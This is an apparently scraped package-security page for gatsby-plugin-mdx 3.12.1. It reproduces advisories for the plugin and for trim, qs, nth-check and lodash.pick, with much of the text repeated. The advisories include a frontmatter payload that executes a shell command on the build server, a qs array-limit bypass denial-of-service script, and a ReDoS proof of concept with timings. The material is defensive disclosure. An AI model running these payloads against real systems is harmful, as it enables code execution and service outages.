Version Details and Security Vulnerabilities

📦

gatsby-plugin-mdx

3.12.1

Comparision Betweeen 3.12.1 and 3.12.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

254.47 KB

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

gatsby-plugin-mdx

3.12.1

Comparision Betweeen 3.12.1 and 3.12.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

254.47 KB

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 3.12.1 of the package gatsby-plugin-mdx.

All Security Vulnerabilities

All the vulnerabilities related to the version 3.12.1 of the package

Summary:

Unsanitized JavaScript code injection possible in gatsby-plugin-mdx

Details:

Impact

The gatsby-plugin-mdx plugin prior to versions 3.15.2 and 2.14.1 passes input through to the gray-matter npm package, which is vulnerable to JavaScript injection in its default configuration, unless input is sanitized. The vulnerability is present when passing input in both webpack (MDX files in src/pages or MDX file imported as component in frontend / React code) and data mode (querying MDX nodes via GraphQL). Injected JavaScript executes in the context of the build server.

To exploit this vulnerability untrusted/unsanitized input would need to be sourced or added into an MDX file. The following MDX payload demonstrates a vulnerable configuration:

---js
((require("child_process")).execSync("id >> /tmp/rce"))
---

Patches

A patch has been introduced in gatsby-plugin-mdx@3.15.2 and gatsby-plugin-mdx@2.14.1 which mitigates the issue by disabling the gray-matter JavaScript Frontmatter engine. The patch introduces a new option, JSFrontmatterEngine which is set to false by default. When setting JSFrontmatterEngine to true, input passed to gatsby-plugin-mdx must be sanitized before processing to avoid a security risk. Warnings are displayed when enabling JSFrontmatterEngine to true or if it appears that the MDX input is attempting to use the Frontmatter engine.

Workarounds

If an older version of gatsby-plugin-mdx must be used, input passed into the plugin should be sanitized ahead of processing.

We encourage projects to upgrade to the latest major release branch for all Gatsby plugins to ensure the latest security updates and bug fixes are received in a timely manner.

Credits

We would like to thank Snyk [snyk.io] for initially bringing the issue to our attention, as well as Feng Xiao and Zhongfu Su, who reported the issue to Snyk.

For more information

Email us at security@gatsbyjs.com.

Details about gatsby-plugin-mdx@3.12.1

Summary:

Regular Expression Denial of Service in trim

Details:

All versions of package trim lower than 0.0.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().

Details about trim@0.0.1

Summary:

qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion

Details:

Summary

The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.

Details

The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = utils.combine([], leaf);  // No arrayLimit check
}

Working code (lib/parse.js:175):

else if (index <= options.arrayLimit) {  // Limit checked here
    obj = [];
    obj[index] = leaf;
}

The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.

PoC

Test 1 - Basic bypass:

npm install qs

const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Use bracket notation: a[]=value (not indexed a[0]=value)

Impact

Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
Application parses with qs.parse(query, { arrayLimit: 100 })
qs ignores limit, parses all 100,000 elements into array
Server memory exhausted → application crashes or becomes unresponsive
Service unavailable for all users

Real-world impact:

Single malicious request can crash server
No authentication required
Easy to automate and scale
Affects any endpoint parsing query strings with bracket notation

Suggested Fix

Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.

Current code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
        ? []
        : utils.combine([], leaf);  // No arrayLimit check
}

Fixed code:

if (root === '[]' && options.parseArrays) {
    // Use currentArrayLength already calculated at line 147-151
    if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
        throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
    }
    
    // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
    if (currentArrayLength >= options.arrayLimit) {
        obj = options.plainObjects ? { __proto__: null } : {};
        obj[currentArrayLength] = leaf;
    } else {
        obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
            ? []
            : utils.combine([], leaf);
    }
}

This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).

Details about qs@6.14.0

Summary:

Inefficient Regular Expression Complexity in nth-check

Details:

There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.

The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i*10000)+"!";
    try {
        nthCheck.parse(attack_str) 
    }
    catch(err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
    }
}

The Output

attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms

Details about nth-check@1.0.2

Summary:

Prototype Pollution in lodash

Details:

Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.

This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.

Details about lodash.pick@4.4.0

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 3.12.1 of the package gatsby-plugin-mdx.

All Security Vulnerabilities

All the vulnerabilities related to the version 3.12.1 of the package

Summary:

Unsanitized JavaScript code injection possible in gatsby-plugin-mdx

Details:

Impact

To exploit this vulnerability untrusted/unsanitized input would need to be sourced or added into an MDX file. The following MDX payload demonstrates a vulnerable configuration:

---js
((require("child_process")).execSync("id >> /tmp/rce"))
---

Patches

Workarounds

If an older version of gatsby-plugin-mdx must be used, input passed into the plugin should be sanitized ahead of processing.

We encourage projects to upgrade to the latest major release branch for all Gatsby plugins to ensure the latest security updates and bug fixes are received in a timely manner.

Credits

We would like to thank Snyk [snyk.io] for initially bringing the issue to our attention, as well as Feng Xiao and Zhongfu Su, who reported the issue to Snyk.

For more information

Email us at security@gatsbyjs.com.

Details about gatsby-plugin-mdx@3.12.1

Summary:

Regular Expression Denial of Service in trim

Details:

All versions of package trim lower than 0.0.3 are vulnerable to Regular Expression Denial of Service (ReDoS) via trim().

Details about trim@0.0.1

Summary:

qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion

Details:

Summary

Details

The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = utils.combine([], leaf);  // No arrayLimit check
}

Working code (lib/parse.js:175):

else if (index <= options.arrayLimit) {  // Limit checked here
    obj = [];
    obj[index] = leaf;
}

PoC

Test 1 - Basic bypass:

npm install qs

const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
Use bracket notation: a[]=value (not indexed a[0]=value)

Impact

Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
Application parses with qs.parse(query, { arrayLimit: 100 })
qs ignores limit, parses all 100,000 elements into array
Server memory exhausted → application crashes or becomes unresponsive
Service unavailable for all users

Real-world impact:

Single malicious request can crash server
No authentication required
Easy to automate and scale
Affects any endpoint parsing query strings with bracket notation

Suggested Fix

Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.

Current code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
        ? []
        : utils.combine([], leaf);  // No arrayLimit check
}

Fixed code:

if (root === '[]' && options.parseArrays) {
    // Use currentArrayLength already calculated at line 147-151
    if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
        throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
    }
    
    // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
    if (currentArrayLength >= options.arrayLimit) {
        obj = options.plainObjects ? { __proto__: null } : {};
        obj[currentArrayLength] = leaf;
    } else {
        obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
            ? []
            : utils.combine([], leaf);
    }
}

This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).

Details about qs@6.14.0

Summary:

Inefficient Regular Expression Complexity in nth-check

Details:

There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.

The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.

Proof of Concept

// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i*10000)+"!";
    try {
        nthCheck.parse(attack_str) 
    }
    catch(err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
    }
}

The Output

attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms

Details about nth-check@1.0.2

Summary:

Prototype Pollution in lodash

Details:

This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.

Details about lodash.pick@4.4.0

Version Details and Security Vulnerabilities

gatsby-plugin-mdx

Comparision Betweeen 3.12.1 and 3.12.0

Security Vulnerabilities

Version Details and Security Vulnerabilities

gatsby-plugin-mdx

Comparision Betweeen 3.12.1 and 3.12.0

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Impact

Patches

Workarounds

Credits

For more information

Summary

Details

PoC

Impact

Suggested Fix

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

Impact

Patches

Workarounds

Credits

For more information

Summary

Details

PoC

Impact

Suggested Fix

Version Details and Security Vulnerabilities

gatsby-plugin-mdx

Comparision Betweeen 3.12.1 and 3.12.0

Security Vulnerabilities

Version Details and Security Vulnerabilities

gatsby-plugin-mdx

Comparision Betweeen 3.12.1 and 3.12.0

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

gatsby-plugin-mdx@3.12.1 GHSA-mj46-r4gr-5x83 8.1

Impact

Patches

Workarounds

Credits

For more information

trim@0.0.1 GHSA-w5p7-h5w8-2hfq 7.5

qs@6.14.0 GHSA-6rw7-vpxm-498p 8.7

Summary

Details

PoC

Impact

Suggested Fix

nth-check@1.0.2 GHSA-rp65-9cf3-cjxr 7.5

lodash.pick@4.4.0 GHSA-p6mc-m468-83gw 7.4

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

gatsby-plugin-mdx@3.12.1 GHSA-mj46-r4gr-5x83 8.1

Impact

Patches

Workarounds

Credits

For more information

trim@0.0.1 GHSA-w5p7-h5w8-2hfq 7.5

qs@6.14.0 GHSA-6rw7-vpxm-498p 8.7

Summary

Details

PoC

Impact

Suggested Fix

nth-check@1.0.2 GHSA-rp65-9cf3-cjxr 7.5

lodash.pick@4.4.0 GHSA-p6mc-m468-83gw 7.4